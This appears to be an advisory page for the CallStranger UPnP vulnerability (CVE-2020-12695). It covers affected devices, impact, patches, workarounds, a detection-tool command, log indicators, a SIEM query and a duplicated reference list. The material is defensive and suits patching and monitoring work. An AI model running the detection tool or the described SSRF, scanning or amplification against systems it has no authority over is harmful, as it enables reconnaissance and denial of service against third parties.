CVE-2020-12695
📋 TL;DR
CallStranger is a UPnP vulnerability that allows attackers to abuse subscription requests to perform SSRF attacks, port scanning, and DDoS amplification. It affects any device or software implementing the vulnerable UPnP specification before April 2020. This includes IoT devices, routers, media servers, and various network-enabled consumer electronics.
💻 Affected Systems
- Any device/software using UPnP protocol
📦 What is this software?
Adsl by Broadcom
Archer C50 by Tp Link
Ep 101 by Epson
Fedora by Fedoraproject
Fedora by Fedoraproject
Hg255s by Huawei
Hg532e by Huawei
Hostapd by W1.fi
M571t by Epson
Ubuntu Linux by Canonical
Wap131 by Cisco
Wap150 by Cisco
Wap351 by Cisco
Windows 10 by Microsoft
Wnhde111 by Netgear
Xbox One by Microsoft
Xp 100 by Epson
Xp 2101 by Epson
Xp 2105 by Epson
Xp 241 by Epson
Xp 320 by Epson
Xp 330 by Epson
Xp 340 by Epson
Xp 4100 by Epson
Xp 4105 by Epson
Xp 440 by Epson
Xp 620 by Epson
Xp 630 by Epson
Xp 702 by Epson
Xp 8500 by Epson
Xp 8600 by Epson
Xp 960 by Epson
Xp 970 by Epson
Zonedirector 1200 by Ruckussecurity
⚠️ Risk & Real-World Impact
Worst Case
Attackers could use vulnerable devices as SSRF proxies to attack internal networks, perform DDoS amplification attacks against third parties, or use them for port scanning and network reconnaissance.
Likely Case
Most commonly exploited for DDoS amplification attacks and network scanning, potentially leading to service disruption and information disclosure about internal network topology.
If Mitigated
With proper network segmentation and UPnP disabled on perimeter devices, impact is limited to internal network reconnaissance within segmented zones.
🎯 Exploit Status
Multiple proof-of-concept tools available on GitHub. Exploitation requires network access to UPnP service but no authentication.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: UPnP specification version after 2020-04-17
Vendor Advisory: https://openconnectivity.org/developer/specifications/upnp-resources/upnp/
Restart Required: Yes
Instructions:
1. Update UPnP implementation to compliant version. 2. Check vendor-specific patches for your devices. 3. Apply firmware updates to affected devices. 4. Restart services/devices after patching.
🔧 Temporary Workarounds
Disable UPnP on perimeter devices
allDisable Universal Plug and Play on internet-facing routers and firewalls
Varies by device - typically in router admin interface under UPnP settings
Network segmentation
allSegment UPnP-enabled devices from critical infrastructure
🧯 If You Can't Patch
- Implement strict egress filtering to block UPnP traffic from reaching the internet
- Deploy network monitoring to detect CallStranger exploitation attempts
🔍 How to Verify
Check if Vulnerable:
Use the CallStranger detection tool from GitHub: python3 callstranger.py --host [target_ip]Check Version:
Check UPnP implementation version or device firmware version against vendor advisoriesVerify Fix Applied:
Run detection tool again after patching - should return 'NOT VULNERABLE'📡 Detection & Monitoring
Log Indicators:
- Unusual UPnP subscription requests
- SSDP traffic to unexpected destinations
- High volume of UPnP NOTIFY messages
Network Indicators:
- UPnP traffic crossing network segments
- SSDP requests with callback URLs to external networks
- Amplified traffic from UPnP devices
SIEM Query:
source_port=1900 AND (dest_ip NOT IN internal_ranges) OR (protocol=SSDP AND size>threshold)🔗 References
- http://packetstormsecurity.com/files/158051/CallStranger-UPnP-Vulnerability-Checker.html
- http://www.openwall.com/lists/oss-security/2020/06/08/2
- https://corelight.blog/2020/06/10/detecting-the-new-callstranger-upnp-vulnerability-with-zeek/
- https://github.com/corelight/callstranger-detector
- https://github.com/yunuscadirci/CallStranger
- https://lists.debian.org/debian-lts-announce/2020/08/msg00011.html
- https://lists.debian.org/debian-lts-announce/2020/08/msg00013.html
- https://lists.debian.org/debian-lts-announce/2020/12/msg00017.html
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/L3SHL4LOFGHJ3DIXSUIQELGVBDJ7V7LB/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MZDWHKGN3LMGSUEOAAVAMOD3IUIPJVOJ/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RQEYVY4D7LASH6AI4WK3IK2QBFHHF3Q2/
- https://usn.ubuntu.com/4494-1/
- https://www.callstranger.com
- https://www.debian.org/security/2020/dsa-4806
- https://www.debian.org/security/2021/dsa-4898
- https://www.kb.cert.org/vuls/id/339275
- https://www.tenable.com/blog/cve-2020-12695-callstranger-vulnerability-in-universal-plug-and-play-upnp-puts-billions-of
- http://packetstormsecurity.com/files/158051/CallStranger-UPnP-Vulnerability-Checker.html
- http://www.openwall.com/lists/oss-security/2020/06/08/2
- https://corelight.blog/2020/06/10/detecting-the-new-callstranger-upnp-vulnerability-with-zeek/
- https://github.com/corelight/callstranger-detector
- https://github.com/yunuscadirci/CallStranger
- https://lists.debian.org/debian-lts-announce/2020/08/msg00011.html
- https://lists.debian.org/debian-lts-announce/2020/08/msg00013.html
- https://lists.debian.org/debian-lts-announce/2020/12/msg00017.html
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/L3SHL4LOFGHJ3DIXSUIQELGVBDJ7V7LB/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MZDWHKGN3LMGSUEOAAVAMOD3IUIPJVOJ/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RQEYVY4D7LASH6AI4WK3IK2QBFHHF3Q2/
- https://usn.ubuntu.com/4494-1/
- https://www.callstranger.com
- https://www.debian.org/security/2020/dsa-4806
- https://www.debian.org/security/2021/dsa-4898
- https://www.kb.cert.org/vuls/id/339275
- https://www.tenable.com/blog/cve-2020-12695-callstranger-vulnerability-in-universal-plug-and-play-upnp-puts-billions-of
